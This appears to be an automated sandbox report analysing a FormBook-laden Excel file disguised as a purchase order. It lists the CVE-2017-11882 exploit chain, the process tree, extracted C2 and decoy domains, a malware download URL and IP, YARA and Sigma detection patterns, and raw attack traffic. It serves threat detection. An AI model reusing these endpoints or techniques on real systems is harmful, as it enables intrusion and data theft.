Windows Analysis Report RFQ_Order_PO_TAE5203E.xlsx

Overview

General Information

Sample Name: RFQ_Order_PO_TAE5203E.xlsx
Analysis ID: 552838
MD5: 552f043a7c752ec7e8dddbdf0b36c4d8
SHA1: cfb4a5bea12cab9a47d3ff1ee1210d444b9a92a4
SHA256: e7a5f1c37a043773027f4937afb63d3178362113132066c7435b6d716eda6cf2
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Found hidden mapped module (file has been removed from disk)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential key logger detected (key state polling based)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2648 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1960 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2240 cmdline: "C:\Users\Public\vbc.exe" MD5: A21C93294EF3770C5C728A1B2D82FB92)
      • vbc.exe (PID: 2124 cmdline: C:\Users\Public\vbc.exe MD5: A21C93294EF3770C5C728A1B2D82FB92)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msiexec.exe (PID: 2036 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
            • cmd.exe (PID: 2640 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}

Yara Overview

Dropped Files

Source | Rule | Description | Author (matched strings listed under each row)
C:\Users\user\AppData\Local\Temp\Cielert.tmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
C:\Users\user\AppData\Local\Temp\Cielert.tmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
C:\Users\user\AppData\Local\Temp\Cielert.tmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C

Memory Dumps

Source | Rule | Description | Author (matched strings listed under each row)
00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
      • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
      • 0x6b18:$sqlite3text: 68 38 2A 90 C5
      • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
      • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(28 further memory dump entries omitted)

Unpacked PEs

Source | Rule | Description | Author (matched strings listed under each row)
5.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
          • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
          • 0x15d18:$sqlite3text: 68 38 2A 90 C5
          • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
          • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
5.0.vbc.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.0.vbc.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
            • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked PE entry omitted)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 209.141.37.110, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1960, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1960, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1960, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2240
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1960, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2240

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook {"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}
Multi AV Scanner detection for submitted file
Source: RFQ_Order_PO_TAE5203E.xlsx; Virustotal: Detection: 35%
Source: RFQ_Order_PO_TAE5203E.xlsx; ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match; File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED
Antivirus detection for URL or domain
Source: http://209.141.37.110/hnmy.exe; Avira URL Cloud: Label: malware
Source: http://www.aloebiotics.com/b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v; Avira URL Cloud: Label: malware
Source: www.dreamschools.online/b80i/; Avira URL Cloud: Label: phishing
Source: http://www.sjljtzsls.com/b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://209.141.37.110/hnmy.exe; Virustotal: Detection: 12%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp; Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\Public\vbc.exe; Avira: detection malicious, Label: TR/Crypt.XPACK.Gen3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe; Avira: detection malicious, Label: TR/Crypt.XPACK.Gen3
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe; Metadefender: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe; ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp; Metadefender: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp; ReversingLabs: Detection: 89%
Source: C:\Users\Public\vbc.exe; Metadefender: Detection: 31%
Source: C:\Users\Public\vbc.exe; ReversingLabs: Detection: 60%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.vbc.exe.400000.0.unpack; Avira: Label: TR/Crypt.XPACK.Gen3
Source: 4.2.vbc.exe.400000.0.unpack; Avira: Label: TR/Crypt.XPACK.Gen3
Source: 5.0.vbc.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.0.unpack; Avira: Label: TR/Crypt.XPACK.Gen3
Source: 8.2.msiexec.exe.2b5796c.6.unpack; Avira: Label: TR/Patched.Gen
Source: 4.1.vbc.exe.400000.0.unpack; Avira: Label: TR/Crypt.XPACK.Gen3
Source: 4.1.vbc.exe.2130000.1.unpack; Avira: Label: TR/Crypt.XPACK.Gen3
Source: 5.0.vbc.exe.400000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: msiexec.pdb; source: vbc.exe, 00000005.00000002.560819872.0000000000460000.00000040.00020000.sdmp, vbc.exe, 00000005.00000002.560884485.00000000004EA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.560868156.00000000004D9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb; source: vbc.exe, vbc.exe, 00000005.00000002.560943288.0000000000750000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.526246673.00000000005C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.561680130.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.525339285.00000000002B0000.00000004.00000001.sdmp, msiexec.exe
Source: C:\Users\Public\vbc.exe; Code function: 4_2_00437A5E __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,
Source: global traffic; DNS query: name: www.aloebiotics.com
Source: C:\Users\Public\vbc.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4x nop then pop edi
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 209.141.37.110:80 (2 identical entries)

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 163.197.71.43:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 163.197.71.43:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 163.197.71.43:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 163.197.71.43 80
Source: C:\Windows\explorer.exe; Domain query: www.mediafyagency.com
Source: C:\Windows\explorer.exe; Network Connect: 64.190.62.111 80
Source: C:\Windows\explorer.exe; Domain query: www.aloebiotics.com
Source: C:\Windows\explorer.exe; Domain query: www.sjljtzsls.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.dreamschools.online/b80i/
Source: Joe Sandbox View; ASN Name: PONYNETUS PONYNETUS
Source: Joe Sandbox View; ASN Name: NBS11696US NBS11696US
Source: global traffic; HTTP traffic detected: GET /b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v HTTP/1.1; Host: www.aloebiotics.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v HTTP/1.1; Host: www.sjljtzsls.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; IP Address: 64.190.62.111 64.190.62.111
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Content-Type: application/octet-stream; Last-Modified: Tue, 11 Jan 2022 22:12:56 GMT; Accept-Ranges: bytes; ETag: "109cc962387d81:0"; Server: Microsoft-IIS/8.5; Date: Fri, 14 Jan 2022 03:08:59 GMT; Content-Length: 598016; Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 89 b6 f8 aa cd d7 96 f9 cd d7 96 f9 cd d7 96 f9 9b c8 85 f9 e8 d7 96 f9 cd d7 96 f9 f5 d7 96 f9 af c8 85 f9 de d7 96 f9 cd d7 97 f9 06 d6 96 f9 4e cb 98 f9 d6 d7 96 f9 25 c8 9c f9 46 d7 96 f9 25 c8 9d f9 ab d7 96 f9 75 d1 90 f9 cc d7 96 f9 52 69 63 68 cd d7 96 f9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 9f 46 58 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 e0 03 00 00 30 05 00 00 00 00 00 35 5a 02 00 00 10 00 00 00 f0 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 70 09 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 41 05 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 f0 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 1c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6d d7 03 00 00 10 00 00 00 e0 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 6c 01 00 00 f0 03 00 00 70 01 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 a3 
00 00 00 60 05 00 00 60 00 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 e8 cc 00 00 00 10 06 00 00 d0 00 00 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 64 61 74 61 00 00 a5 8e 02 00 00 e0 06 00 00 90 02 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /hnmy.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 209.141.37.110; Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 209.141.37.110 (50 identical entries)
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
